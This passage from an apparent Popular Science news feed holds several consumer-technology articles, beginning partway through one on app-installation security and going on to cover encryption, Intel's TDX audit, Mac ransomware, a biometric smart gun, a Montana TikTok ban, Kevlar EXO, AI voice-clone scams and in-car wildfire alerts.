Reviews can be faked of course, even in large numbers. Don’t be too trusting of very short and very positive reviews, or reviews left by people with usernames that are generic or look like they might have been created by a bot. Place most faith in longer, more detailed reviews that sound like they’ve been written by someone who’s actually used the software in question.

3. Can you trust the developer?

It doesn’t hurt to run a background check on the person or company that made the software, and the developer’s name should be shown quite prominently on the app listing or the webpage you’re downloading from. Clearly if it’s a well-known name, like Adobe or Google, it’s a piece of software you can rely on.

If you’re on Android or iOS, you can tap the developer name on an app listing to see other apps from the same developer. If they’ve made several apps that all have high ratings, that’s positive. Developer responses to user reviews are a good sign as well, showing that whoever is behind the software is invested in it.

Checking up on the developer of an app that you’re downloading from the wilds of the web isn’t quite as straightforward, but a quick web search for their name should give you some pointers. Developers without any online or social media presence, for instance, should be treated with caution.

4. How much does it cost?

Pay particular attention to how much an app costs, both in terms of up-front fees and ongoing payments: These details are listed on app pages on Android and iOS, and should be fairly straightforward to find on other platforms too. You don’t want an app that’s going to extort money out of you, but you also need to figure out how the costs of development are being supported.

Like the other questions here, there are no hard and fast rules, but if an app is completely free it’s most likely supported through data collection and advertising—this is true from the biggest names in tech, like Facebook and Google, to the smallest independent developers. Freemium models are common too, where some features might be locked behind a paywall.

[Related on PopSci+: You have the power to protect your data. Own it.]

If you get as far as installing an app, go through the opening splash screens very carefully, and pay attention to the terms and conditions. Watch out for any free trials you might be signing up for,that could be charging your credit card unexpectedly in a month’s time (even if you’ve uninstalled the app).

The in-app pricing list for Bumble.
Check the app list for any in-app payments. David Nield for Popular Science

5. Which permissions does it need?

If you’re installing an app through an official app store, you should see a list of the permissions it requires, such as access to your camera and microphone. You’ll also get prompts on your phone or laptop when these permissions are requested. Be on the lookout for permissions that seem unreasonable or don’t make sense, as they could indicate a piece of software that’s less trustworthy.

Ideally, apps should explain to you why they need the permissions they do. Access to your contacts, for example, can be used to easily share files with friends and family, rather than to pull any personal data from them. It’s not an exact science, but it’s another way of assessing whether or not you want to install a particular program.

You can change app permissions after they’ve been installed, too, and you should check in on these every once in a while because settings may change as developers update their app. We’ve written guides to the process for Windows and macOS, and for Android and iOS. If you do think that a piece of software is reaching further than it should do in terms of permissions, you can block off its access to them rather than removing it.

The post Stop and ask these 5 security questions before installing any app appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Some of your everyday tech tools lack this important security feature https://www.popsci.com/technology/slack-messages-privacy-encryption/ Sat, 29 Apr 2023 11:00:00 +0000 https://www.popsci.com/?p=537625
slack on a laptop
Austin Distel / Unsplash

You should be paying attention to which apps and services are end-to-end encrypted, and which aren't.

The post Some of your everyday tech tools lack this important security feature appeared first on Popular Science.

]]>
slack on a laptop
Austin Distel / Unsplash

When it comes to computers, convenience and security are often at odds. A simple, easy-to-use system that you can’t lock yourself out of tends to be less secure than something a little less user-friendly. This is often the case with end-to-end encryption (E2EE), a system in which messages, backups, and anything else can only be decrypted by someone with the right key—and not the provider of the service or any other middlemen. While much more secure, it does have some issues with convenience, and it’s been in the news a lot lately. 

The UK Parliament is currently considering its long awaited Online Safety Bill, which would essentially make secure end-to-end encryption illegal. Both WhatsApp and Signal, which use E2EE for their messaging apps, said they would pull out of the UK market rather than compromise user security. 

Slack, on the other hand, doesn’t use E2EE to protect its users. This means that Slack can theoretically access most messages sent on its service. (The highest paying corporate customers can use their own encryption set up, but the bosses or IT department can then read any employee messages if they are the ones in control of the key.) Fight for the Future, a digital rights group, has just launched a campaign calling on Slack to change this, as it currently “puts people who are seeking, providing, and facilitating abortions at risk in a post-Roe environment.”

Finally, Google has updated its two-factor Authenticator app to allow the secret one-time codes that allow you to log in to sync between devices. This means that users don’t need to reconfigure every account with 2FA set up when they get a new phone. Unfortunately, as two security researchers pointed out on Twitter, Google Authenticator doesn’t yet use E2EE, so Google—or anyone who compromised your Google account—can see the secret information used to generate 2FA one-time codes. While exploiting this might take work, it fatally undermines what’s meant to be a secure system. In response, Google has said it will add E2EE, but has given no timeline.

[Related: 7 secure messaging apps you should be using]

For such an important technology, E2EE is a relatively simple idea—though the math required to make it work is complicated and involves factoring a lot of very large numbers. It’s easiest to understand with something like text messages, though the same principles can be used to secure other kinds of digital communications—like two-factor authorization codes, device back ups, and photo libraries. (For example, messages sent through iMessage, Signal, and WhatsApp are end-to-end encrypted, but a standard SMS message is not.)

E2EE generally uses a system called public key cryptography. Every user has two keys that are mathematically related: a public key and a private key. The public key can genuinely be public; it’s not a secret piece of information. The private key, on the other hand, has to be protected at all costs—it’s what makes the encryption secure. Because the public key and private key are mathematically related, a text message that is encoded with someone’s public key using a hard-to-reverse algorithm can only be decoded using the matching private key. 

So, say Bob wants to send Alice an encrypted text message. The service they’re using stores all the public keys on a central server and each user stores their private keys on their own device. When he sends his message, the app will convert it into a long number, get Alice’s public key from the server (another long number), and run both numbers through the encryption algorithm. That really long number that looks like absolute nonsense to everyone else gets sent to Alice, and her device then decrypts it with her private key so she can read the text. 

But this example also highlights where E2EE can cause headaches. What happens if Alice loses her device containing her private key? Well, then she can’t decrypt any messages that anyone sends her. And since her private key isn’t backed up anywhere, she has to set up an entirely new messaging account. That’s annoying if it’s a texting app, but if it’s an important backup or a 2FA system, getting locked out of your account because you lost your private key is a very real risk with no good solution. 

And what happens if Bob sends Alice a message about his plans for world domination? Well, if the UK government has a law in place that they must be copied on all messages about world domination, the service provider is in a bit of a bind. They can’t offer E2EE and perform any kind of content moderation. 

This is part of why E2EE is so often in the news. While it’s theoretically great for users, for the companies offering these services, there is a very real trade-off between providing users with great security and setting things up so that customer support can help people who lock themselves out of their accounts, and so that they can comply with government demands and subpoenas. Don’t expect to see encryption out of the news any time soon. 

The post Some of your everyday tech tools lack this important security feature appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Cloud computing has its security weaknesses. Intel’s new chips could make it safer. https://www.popsci.com/technology/intel-chip-trust-domain-extensions/ Tue, 25 Apr 2023 19:00:00 +0000 https://www.popsci.com/?p=536626
a computer chip from Intel
Intel's new chip comes with verified security upgrades. Christian Wiediger / Unsplash

A new security feature called Trust Domain Extensions has undergone a months-long audit.

The post Cloud computing has its security weaknesses. Intel’s new chips could make it safer. appeared first on Popular Science.

]]>
a computer chip from Intel
Intel's new chip comes with verified security upgrades. Christian Wiediger / Unsplash

Intel and Google Cloud have just released a joint report detailing a months-long audit of a new security feature on Intel’s latest server chips: Trust Domain Extensions (TDX). The report is a result of a collaboration between security researchers from Google Cloud Security and Project Zero, and Intel engineers. It led to a number of pre-release security improvements for Intel’s new CPUs.

TDX is a feature of Intel’s 4th-generation “Sapphire Rapids” Xeon processors, though it will be available on more chips in the future. It’s designed to enable Confidential Computing on cloud infrastructure. The idea is that important computations are encrypted and performed on hardware that’s isolated from the regular computing environment. This means that the cloud service operator can’t spy on the computations being done, and makes it harder for hackers and other bad actors to intercept, modify, or otherwise interfere with the code as it runs. It basically makes it safe for companies to use cloud computing providers like Google Cloud and Amazon Web Services for processing their most important data, instead of having to operate their own secure servers.

However, for organizations to rely on features like TDX, they need some way to know that they’re genuinely secure. As we’ve seen in the past with the likes of Meltdown and Spectre, vulnerabilities at the processor level are incredibly hard to detect and mitigate for, and can allow bad actors an incredible degree of access to the system. A similar style of vulnerability in TDX, a supposedly secure processing environment, would be an absolute disaster for Intel, any cloud computing provider that used its Xeon chips, and their customers. That’s why Intel invited the Google security researchers to review TDX so closely. Google also collaborated with chipmaker AMD on a similar report last year.

According to Google Cloud’s blogpost announcing the report, “the primary goal of the security review was to provide assurances that the Intel TDX feature is secure, has no obvious defects, and works as expected so that it can be confidently used by both cloud customers and providers.” Secondarily, it was also an opportunity for Google to learn more about Intel TDX so they could better deploy it in their systems. 

While external security reviews—both solicited and unsolicited—are a common part of computer security, Google and Intel engineers collaborated much more closely for this report. They had regular meetings, used a shared issue tracker, and let the Intel engineers “provide deep technical information about the function of the Intel TDX components” and “resolve potential ambiguities in documentation and source code.”

The team looked for possible methods hackers could use to execute their own code inside the secure area, weaknesses in how data was encrypted, and issues with the debug and deployment facilities. 

In total, they uncovered 81 potential attack vectors and found ten confirmed security issues. All the problems were reported to Intel and were mitigated before these Xeon CPUs entered production. 

As well as allowing Google to perform the audit, Intel is open-sourcing the code so that other researchers can review it. According to the blogpost, this “helps Google Cloud’s customers and the industry as a whole to improve our security posture through transparency and openness of security implementations.”

All told, Google’s report concludes that the audit was a success since it met its initial goals and “was able to ensure significant security issues were resolved before the final release of Intel TDX.” While there were still some limits to the researchers access, they were still able to confirm that “the design and implementation of Intel TDX as deployed on the 4th gen Intel Xeon Scalable processors meets a high security bar.” 

The post Cloud computing has its security weaknesses. Intel’s new chips could make it safer. appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Ransomware intended for Macs is cause for concern, not panic https://www.popsci.com/technology/ransomware-for-macs/ Tue, 18 Apr 2023 22:00:00 +0000 https://www.popsci.com/?p=534984
Internet photo
Unsplash / Martin Katler

While it's a bad sign to see ransomware designed to target macOS, the code so far appears to be sloppy.

The post Ransomware intended for Macs is cause for concern, not panic appeared first on Popular Science.

]]>
Internet photo
Unsplash / Martin Katler

For the first time, a prominent ransomware group appears to be actively targeting macOS computers. Discovered last weekend by MalwareHunterTeam, the code sample suggests that the Russia-based LockBit gang is working on a version of its malware that would encrypt files on Mac devices.

Small businesses, large enterprises, and government institutions are frequently the target of ransomware attacks. Hackers often use phishing emails to send real-seeming messages to try to trick staff into downloading the ransomware payload. Once it’s in, the malware spreads around any computer systems, automatically encrypting user files and preventing the organization from operating until a ransom is paid—usually in crypto currencies like Bitcoin. 

Over the past few years, ransomware attacks have disrupted fuel pipelines, schools, hospitals, cloud providers, and countless other businesses. LockBit has been responsible for hundreds of these attacks, and in the past six months has brought down the UK’s Royal Mail international shipping service and disrupted operations in a Canadian children’s hospital over the Christmas period.

Up until now, these ransomware attacks mostly targeted Windows, Linux, and other enterprise operating systems. While Apple computers are popular with consumers, they aren’t as commonly used in the kind of businesses and other deep-pocketed organizations that ransomware gangs typically go after. 

MalwareHunterTeam, an independent group of security researchers, only discovered the Mac encryptors recently, but they have apparently been present on malware-tracking site VirusTotal since November last year. One encryptor targets Apple Macs with the newer M1 chips, while another targets those with Power PC CPUs, which were all developed before 2006. Presumably, there is a third encryptor somewhere that targets Intel-based Macs, although it doesn’t appear to be in the VirusTotal repository. 

Fortunately, when BleepingComputer assessed the Apple M1 encryptor, it found a fairly half-baked bit of malware. There were lots of code fragments that they said “are out of place in a macOS encryptor.” It concluded that the encryptor was “likely haphazardly thrown together in a test.”

In a deep dive into the M1 encryptor, security researcher Patrick Wardle discovered much the same thing. He found that the code was incomplete, buggy, and missing the features necessary to actually encrypt files on a Mac. In fact, since it wasn’t signed with an Apple Developer ID, it wouldn’t even run in its present state. According to Wardle, “the average macOS user is unlikely to be impacted by this LockBit macOS sample” but that a “large ransomware gang has apparently set its sights on macOS, should give us pause for concern and also catalyze conversions about detecting and preventing this (and future) samples in the first place!”

Apple has also preemptively implemented a number of security features that mitigate the risks from ransomware attacks. According to Wardle, operating system-level files are protected by both System Integrity Protection and read-only system volumes. This makes it hard for ransomware to do much to disrupt how macOS works even if it does end up on your computer. Similarly, Apple protects directories such as the Desktop, Documents, and other folders, so the ransomware wouldn’t be able to encrypt them without user approval or an exploit. This doesn’t mean it’s impossible that ransomware could work on a Mac, but it certainly won’t be easy on those that are kept up-to-date with the latest security features. 

Still, the fact that a large hacking group is seemingly targeting Macs is still a big deal—and it’s a reminder that whatever reputation Apple has for developing more secure devices is constantly being put to the test. When BleepingComputer contacted LockBitSupp, the public face of LockBit, the group confirmed that a Mac encryptor is “actively being developed.” While the ransomware won’t do much in its present state, you should always keep your Mac up-to-date—and be careful with any suspicious files you download from the internet.

The post Ransomware intended for Macs is cause for concern, not panic appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Startup claims biometric scanning can make a ‘secure’ gun https://www.popsci.com/technology/biofire-smart-gun/ Tue, 18 Apr 2023 20:00:00 +0000 https://www.popsci.com/?p=534244
Biofire Smart Gun resting on bricks
The Biofire Smart Gun is a 9mm handgun supposedly secured by fingerprint and facial recognition biometrics. Biofire

Biofire says combining fingerprint and facial scanning with handguns could reduce unintended use. Experts point to other issues.

The post Startup claims biometric scanning can make a ‘secure’ gun appeared first on Popular Science.

]]>
Biofire Smart Gun resting on bricks
The Biofire Smart Gun is a 9mm handgun supposedly secured by fingerprint and facial recognition biometrics. Biofire

Reports from the Centers for Disease Control show gun violence is the leading cause of death among children and adolescents in the United States. In 2021, a separate study indicated over a third of its surveyed adolescents alleged being able to access a loaded household firearm in less than five minutes. When locked in a secure vault or cabinet, nearly one-in-four claimed they could access the stored gun within the same amount of time. In an effort to tackle this problem, a 26-year-old MIT dropout backed by billionaire Peter Thiel is now offering a biometrics-based solution. But experts question the solution’s efficacy, citing previous data on gun safety and usage.

Last Thursday, Kai Kloepfer, founder and CEO of Biofire, announced the Smart Gun, a 9mm pistol that only fires after recognizing an authorized user’s fingerprints and facial scans. Using “state-of-the-art” onboard software, Kloepfer claims their Smart Gun is the first “fire-by-wire” weapon, meaning that it relies on electronic signals to operate, rather than traditional firearms’ trigger mechanisms. Kloepfer claimed the product only takes “a millisecond” to unlock and said the gun otherwise operates and feels like a standard pistol, in a profile by Bloomberg. He hopes the Smart Gun could potentially save “tens of thousands of lives.”

In a statement provided to PopSci, Biofire founder and CEO Kai Kloepfer stated, “Firearm-related causes now take the lives of more American children than any other cause, and the problem is getting worse.” Kloepfer argued that accidents, suicides, homicides, and mass shootings among children reduced when gun owners have “faster, better tools that prevent the unwanted use of their firearms,” and claims the Smart Gun is “now the most secure option at a time when more solutions are urgently needed.”

[Related: A new kind of Kevlar aims to stop bullets with less material.]

Biometric scanning devices have extensive, documented histories of accuracy and privacy issues, particularly concerning racial bias and safety. Biofire claims that, to maintain the device’s security, the weapon relies upon a solid state, encrypted electronic fire control technology utilized by modern fighter jets and missile systems. Any biometric data stays solely on the firearm itself, the company says, which does not feature onboard Bluetooth, WiFi, or GPS capabilities. A portable, touchscreen-enabled Smart Dock also supplies an interface for the weapon’s owner to add or remove up to five users. The announcement declares the Smart Gun is “impossible to modify” or convert into a conventional handgun. The Smart Gun’s biometric capabilities are powered by a lithium-ion battery that purportedly lasts several months on a single charge, and “can fire continuously for several hours.” 

According to Daniel Webster, Bloomberg Professor of American Health in Violence Prevention and a Distinguished Scholar at Johns Hopkins Center for Gun Violence Solutions, Biofire may have developed an advancement in gun safety, but Webster considers Biofire’s longterm impact on “firearm injury, violence, and suicide” to be “a very open ended question.”

[Related: Two alcohol recovery apps shared user data without their consent.]

“I’d be very cautious about [any] estimated deaths and injuries advertised by the technology,” Webster wrote to PopSci in an email. While Biofire boasts its safety capabilities, “Many of these estimates are based on an unrealistic assumption that these personalized or ‘smart guns’ would magically replace all existing guns that lack the technology… We have more guns than people in the US and I doubt that everyone will rush to melt down their guns and replace them with Biofire guns.”

The shooting experience is seamless—authorized users can simply pick the gun up and fire it.
Promotional material for Biofire’s Smart Gun. CREDIT: Biofire

Webster is also unsure who would purchase the Biofire Smart Gun. Citing a 2016 survey he co-conducted and published in 2019, Webster says there appears to be “noteworthy skepticism” among gun owners at the prospect of “personalized” or smart guns. “While we did not describe the exact technology that Biofire is using… interest or demand for personalized guns was greatest among gun owners who already stored their guns safely and were more safety-minded,” he explains.

[Related: Tesla employees allegedly viewed and joked about drivers’ car camera footage.]

For Webster, the main question boils down to how a Biofire Smart Gun will affect people’s exposure to firearms within various types of risk. Although he concedes the technology could hypothetically reduce the amount of underage and unauthorized use of improperly stored weapons, there’s no way to know how many new guns might enter people’s lives with the release of the Smart Gun. “How many people [would] bring [Smart Guns] into their homes because the guns are viewed as safe who otherwise wouldn’t?” he asks. Webster also worries Biofire’s new product arguably won’t deal with the statistically biggest problem within gun ownership.

While some self-inflicted harm could be reduced by biometric locks, the vast majority of firearm suicides occur via the gun’s original owner—according to Pew Research Center, approximately 54-percent (24,292) of all gun deaths in 2020 resulted from self-inflicted wounds. Additionally, guns within a home roughly doubles the risk for domestic homicides, nearly all of which are committed by the guns’ owners.

“Biofire is strongly committed to expanding access to safe and informed gun ownership and emphasizes the importance of education and training to every current and future gun owner,” the company stated in its official announcement. The company plans to begin shipping their Smart Gun in early 2024 at a starting price of $1,499, “in adherence with all applicable state and local regulations.”

The post Startup claims biometric scanning can make a ‘secure’ gun appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Montana may soon make it illegal to use TikTok in the state https://www.popsci.com/technology/montana-tiktok-ban/ Mon, 17 Apr 2023 15:30:00 +0000 https://www.popsci.com/?p=534555
TikTok app download screen on smartphone
It could soon technically be illegal to use TikTok in Montana. Deposit Photos

There is still no definitive proof TikTok or its owner company is surveilling US users.

The post Montana may soon make it illegal to use TikTok in the state appeared first on Popular Science.

]]>
TikTok app download screen on smartphone
It could soon technically be illegal to use TikTok in Montana. Deposit Photos

Montana is one step away from instituting a state-wide wholesale ban of TikTok. On Friday, the state’s House of Representatives voted 54-43 in favor of passing SB419, which would blacklist the immensely popular social media platform from operating within the “territorial jurisdiction of Montana,”  as well as prohibit app stores from offering it to users. The legislation now heads to Republican Gov. Greg Gianforte, who has 10 days to sign the bill into law, veto it, or allow it to go into effect without issuing an explicit decision.

Although a spokesperson only said that Gov. Gianforte would “carefully consider any bill the Legislature sends to his desk,” previous statements and actions indicate a sign-off is likely. Gianforte banned TikTok on all government devices last year after describing the platform as a “significant risk” for data security.

TikTok is owned by the China-based company, ByteDance, and faces intense scrutiny from critics on both sides of the political aisle over concerns regarding users’ privacy. Many opponents of the app also claim it subjects Americans to undue influence and propaganda from the Chinese government. Speaking with local news outlet KTVH last week, Montana state Sen. Shelley Vance alleged that “we know that beyond a doubt that TikTok’s parent company ByteDance is operating as a surveillance arm of the Chinese Communist Party and gathers information about Americans against their will.”

[Related: Why some US lawmakers want to ban TikTok.]

As Gizmodo also notes, however, there is still no definitive proof TikTok or ByteDance is surveilling US users, although company employees do have standard access to user data. Regardless, many privacy advocates and experts warn that the continued focus on TikTok ignores the much larger and more pervasive data privacy issues affecting Americans. The RESTRICT Act, for example, is the most notable federal effort to institute a wholesale blacklisting of TikTok, but critics have voiced numerous worries regarding its expansive language, ill-defined enforcement, and unintended consequences. The bill’s ultimate fate still remains unclear.

If Montana’s SB419 ultimately moves forward, it will go into effect on January 1, 2024. The bill proposes a $10,000 per day fine on any app store, or TikTok itself, if it continues to remain available within the state afterwards. The proposed law does not include any penalties on individual users.

In a statement reported by The New York Times, a TikTok spokesperson said the company “will continue to fight for TikTok users and creators in Montana whose livelihoods and First Amendment rights are threatened by this egregious government overreach.”

The post Montana may soon make it illegal to use TikTok in the state appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
A new kind of Kevlar aims to stop bullets with less material https://www.popsci.com/technology/new-kevlar-exo-body-armor/ Sat, 15 Apr 2023 11:00:00 +0000 https://www.popsci.com/?p=534315
The new Kevlar fabric.
The new Kevlar fabric. DuPont

It's not quite the stuff of John Wick's suit, but this novel fiber is stronger than its predecessor.

The post A new kind of Kevlar aims to stop bullets with less material appeared first on Popular Science.

]]>
The new Kevlar fabric.
The new Kevlar fabric. DuPont

Body armor has a clear purpose: to prevent a bullet, or perhaps a shard from an explosion, from puncturing the fragile human tissue behind it. But donning it doesn’t come lightly, and its weight is measured in pounds. For example, the traditional Kevlar fabric that would go into soft body armor weighs about 1 pound per square foot, and you need more than one square foot to do the job. 

But a new kind of Kevlar is coming out, and it aims to be just as resistant to projectiles as the original material, while also being thinner and lighter. It will not be tailored into a John Wick-style suit, which is the stuff of Hollywood, but DuPont, the company that makes it, says that it’s about 30 percent lighter. If the regular Kevlar has that approximate weight of 1 pound per square foot, the new stuff weighs in at about .65 or .7 pounds per square foot. 

“We’ve invented a new fiber technology,” says Steven LaGanke, a global segment leader at DuPont.

Here’s what to know about how bullet-resistant material works in general, and how the new stuff is different. 

A bullet-resistant layer needs to do two tasks: ensure that the bullet cannot penetrate it, and also absorb its energy—and translate that energy into the bullet itself, which ideally deforms when it hits. A layer of fabric that could catch a bullet but then acted like a loose net after it was hit by a baseball would be bad, explains Joseph Hovanec, a global technology manager at the company. “You don’t want that net to fully extend either, because now that bullet is extending into your body.”

The key is how strong the fibers are, plus the fact that “they do not elongate very far,” says Hovanec. “It’s the resistance of those fibers that will then cause the bullet—because it has such large momentum, [or] kinetic energy—to deform. So you’re actually catching it, and the energy is going into deforming the bullet versus breaking the fiber.” The bullet, he says, should “mushroom.” Here’s a simulation video.

Kevlar is a type of synthetic fiber called a para-aramid, and it’s not the only para-aramid in town: Another para-aramid that can be used in body armor is called Twaron, made by a company called Teijin Limited. Some body armor is also made out of polyethylene, a type of plastic. 

The new form of Kevlar, which the company calls Kevlar EXO, is also a type of aramid fiber, although slightly different from the original Kevlar. Regular Kevlar is made up of two monomers, which is a kind of molecule, and the new kind has one more monomer, for a total of three. “That third monomer allows us to gain additional alignment of those molecules in the final fiber, which gives us the additional strength, over your traditional aramid, or Kevlar, or polyethylene,” says Hovanec.

Body armor in general needs to meet a specific standard in the US from the National Institute of Justice. The goal of the new kind of Kevlar is that because it’s stronger, it could still meet the same standard while being used in thinner quantities in body armor. For example, regular Kevlar is roughly 0.26 or .27 inches thick, and the new material could be as thin as 0.19 inches, says Hovanec. “It’s a noticeable decrease in thickness of the material.”  

And the ballistic layer that’s made up of a material like Kevlar or Twaron is just one part of what goes into body armor. “There’s ballistics [protection], but then the ballistics is in a sealed carrier to protect it, and then there’s the fabric that goes over it,” says Hovanec. “When you finally see the end article, there’s a lot of additional material that goes on top of it.”

The post A new kind of Kevlar aims to stop bullets with less material appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
A mom thought her daughter had been kidnapped—it was just AI mimicking her voice https://www.popsci.com/technology/ai-vocal-clone-kidnapping/ Fri, 14 Apr 2023 19:00:00 +0000 https://www.popsci.com/?p=534141
Hands holding and using smartphone in night light
It's getting easier to create vocal clones using AI software. Deposit Photo

AI software that clones your voice is only getting cheaper and easier to abuse.

The post A mom thought her daughter had been kidnapped—it was just AI mimicking her voice appeared first on Popular Science.

]]>
Hands holding and using smartphone in night light
It's getting easier to create vocal clones using AI software. Deposit Photo

Scammers are increasingly relying on AI voice-cloning technology to mimic a potential victim’s friends and loved ones in an attempt to extort money. In one of the most recent examples, an Arizonan mother recounted her own experience with the terrifying problem to her local news affiliate.

“I pick up the phone and I hear my daughter’s voice, and it says, ‘Mom!’ and she’s sobbing,” Jennifer DeStefano told a Scottsdale area CBS affiliate earlier this week. “I said, ‘What happened?’ And she said, ‘Mom, I messed up,’ and she’s sobbing and crying.”

[Related: The FTC has its eye on AI scammers.]

According to DeStefano, she then heard a man order her “daughter” to hand over the phone, which he then used to demand $1 million in exchange for their freedom. He subsequently lowered his supposed ransom to $50,000, but still threatened bodily harm to DeStefano’s teenager unless they received payment. Although it was reported that her husband confirmed the location and safety of DeStefano’s daughter within five minutes of the violent scam phone call, the fact that con artists can so easily utilize AI technology to mimic virtually anyone’s voice has both security experts and potential victims frightened and unmoored.

As AI advances continue at a breakneck speed, once expensive and time-consuming feats such as AI vocal imitation are both accessible and affordable. Speaking with NPR last month, Subbarao Kambhampati, a professor of computer science at Arizona State University, explained that “before, [voice mimicking tech] required a sophisticated operation. Now small-time crooks can use it.”

[Related: Why the FTC is forming an Office of Technology.]

The story of DeStefano’s ordeal arrived less than a month after the Federal Trade Commission issued its own warning against the proliferating con artist ploy. “Artificial intelligence is no longer a far-fetched idea out of a sci-fi movie. We’re living with it, here and now,” the FTC said in its consumer alert, adding that all a scammer now needs is a “short audio clip” of someone’s voice to recreate their tone and inflections. Often, this source material can be easily obtained via social media content. According to Kambhampati, the clip can be as short as three seconds, and still produce convincing enough results to fool unsuspecting victims.

To guard against the rising form of harassment and extortion, the FTC advises to treat such claims skeptically at first. Often these scams come from unfamiliar phone numbers, so it’s important to try contacting the familiar voice themselves immediately afterward to verify the story—either via their own real phone number, or through a relative or friend. Con artists often demand payment via cryptocurrencies, wire money, or gift cards, so be wary of any threat that includes those options as a remedy.

The post A mom thought her daughter had been kidnapped—it was just AI mimicking her voice appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
In the future, your car could warn you about nearby wildfires https://www.popsci.com/technology/wildfire-warning-system-for-cars/ Fri, 14 Apr 2023 14:00:00 +0000 https://www.popsci.com/?p=533978
It's common to receive alerts on your phone, but a new initiative aims to send them directly to your vehicle.
It's common to receive alerts on your phone, but a new initiative aims to send them directly to your vehicle. Marcus Kauffman / Unsplash

Officials are working on a system to send alerts straight to vehicle infotainment systems. Here's how it would work.

The post In the future, your car could warn you about nearby wildfires appeared first on Popular Science.

]]>
It's common to receive alerts on your phone, but a new initiative aims to send them directly to your vehicle.
It's common to receive alerts on your phone, but a new initiative aims to send them directly to your vehicle. Marcus Kauffman / Unsplash

On a late summer day last year, an emergency test alert popped up for a small number of pre-selected drivers in Fairfax County, Virginia, warning of a fictitious brushfire in their area. But this message didn’t just come through a beep or buzz on their phones—it was also shared directly on the infotainment consoles in their cars, with a “fire zone” area appearing on their on-screen maps. 

These test messages were for a live demonstration of a years-in-the-making project to update emergency alerts for wildfires. While wireless emergency alerts have been available on cell phones for more than a decade, there is currently no method for sending them directly to car screens. The hope for this new system is that having an alert display in vehicles could help authorities reach people who live in areas at risk of wildfires—people who are otherwise challenging to notify through other warning methods. 

In particular, this pilot project is focused on the “wildland-urban interface,” or WUI. According to the Federal Emergency Management Agency (FEMA), WUI areas are any neighborhoods or residential settlements at the cusp of, or even mixed in with, undeveloped land. Across the United States, more than 46 million homes are at a heightened risk of wildfires due to their location in the WUI. 

When a wildfire does occur in these areas, it can be particularly difficult to notify residents. Oftentimes, homes in WUI regions are spread out, making methods like sirens or door-knocking less viable. These areas also tend to have limited reception and internet connectivity, which can mean residents do not receive cell phone alerts. And even if the alerts do come through, they typically do not include direction information to get to safety. In recent years, multiple WUI communities have reported a lack in sufficient wildfire warnings, including those impacted by the 2018 Camp Fire in California and the 2021 Marshall Fire in Colorado. In some cases, community members in such areas have even developed their own apps and outlets in an effort to address this gap. 

It was after learning about residents’ frustrations following the Marshall Fire that Norman Speicher says his office began to explore other alerting options. Speicher works at the Department of Homeland Security as a program manager for the Science and Technology Directorate (S&T), which is the research and development branch of DHS. His team wanted to find new ways to “bring the information to where people already are,” Speicher says, and became interested in the idea of sending messages straight to car infotainment systems, which are the built-in screens that can display your connected phone, GPS services, and other information about your vehicle.

The Virginia test in August 2022 was the first (almost) real-world trial of that idea, which the S&T is calling the WUI Integration Model. While it’s still deep in development, Speicher is confident that the team will ultimately be able to produce a system that can generate a virtual map of future wildfires and alert drivers in surrounding areas to stay away. One day, he hopes it could even be able to help drivers navigate away safely. But getting to that point requires not only new technology—it also calls for forging paths through the worlds of warnings and car systems, all without losing sight of what makes a warning message successful.

Understanding existing emergency alerts 

The WUI Integration Model is part of a warning landscape that Jeannette Sutton describes as “complicated.” An associate professor at the State University of New York at Albany’s College of Emergency Preparedness, Homeland Security, and Cybersecurity, Sutton researches all things related to emergency alerts, from official public warnings to social media posts. 

There are a few major pathways to warn the public of disasters in the United States, she explains. There are public-facing alerts that require no effort from residents—like sirens, highway billboards, and messages sent through radios or TVs. There are also opt-in measures, like following emergency agencies on social media and specific apps or messaging systems that emergency managers in some municipalities use to send local residents messages. 

Then there is the wireless emergency alert system, which sends geographically-targeted messages straight to your cell phone. This operates as an opt-out measure, meaning all capable phones will receive these warnings unless someone takes action to turn them off. (For example, if you have an iPhone, you can check your preferences by going into Settings, then selecting Notifications and scrolling all the way down until you see the Government Alerts section.) In the 11 years since this program launched, the Federal Communication Commission says it has issued more than 70,000 messages sharing critical information. 

[Related: A network of 1,000 cameras is watching for Western wildfires—and you can, too]

To actually get these wireless emergency alerts to your cell phone, emergency officials use FEMA’s Integrated Public Alert and Warning System, or IPAWS, which is a kind of one-stop shop for all national broadcast warnings. Emergency officials craft messages that IPAWS can understand, which are then sent through to the correct alerting pipeline, whether its wireless emergency alerts to cell phones or dispatches through radio and TV. This system is also a key player in the new WUI Integration Model.

From IPAWS to your infotainment system

In order to bridge the gap between IPAWS and car consoles, S&T began working with FEMA, consulting firm Corner Alliance, and HAAS Alert, a business specializing in digital automotive and roadway alerts. These partnerships have been particularly helpful in understanding just how infotainment centers function, says Speicher. He describes this particular arm of the automotive industry as a “Wild West” since different automakers have various approaches—some develop their own proprietary infotainment consoles, while others work with third-party providers. Plus, there are various systems that can be integrated with the infotainment centers, like Apple CarPlay and Android Auto. 

Speicher says his team was able to develop a system that would serve car brands that work with Stellantis, an automaker whose brands includes Chrysler, Jeep, and a host of others. The multi-company partnership operates with HAAS serving as a conduit between an outpost of the IPAWS system and Stellantis.

So, when a disaster happens, the model operates like this: an emergency manager drafts the necessary alert into IPAWS, from which it is added to an open-platform feed. HAAS then picks up the message, decodes and processes it, and redistributes it to Stellantis, which in turn pushes the message out to its network of vehicles. From there, location services within the Stellantis infotainment consoles determine if the alert is relevant to display. 

In the case of the demo last summer, the Fairfax Office of Emergency Management in Virginia sent out the test alert, which was distributed through infotainment consoles to other members of the project team who drove within a one-mile radius of the fake fire. Speicher says the test was valuable as a proof of concept but also was helpful in revealing additional needs and opportunities for future development. 

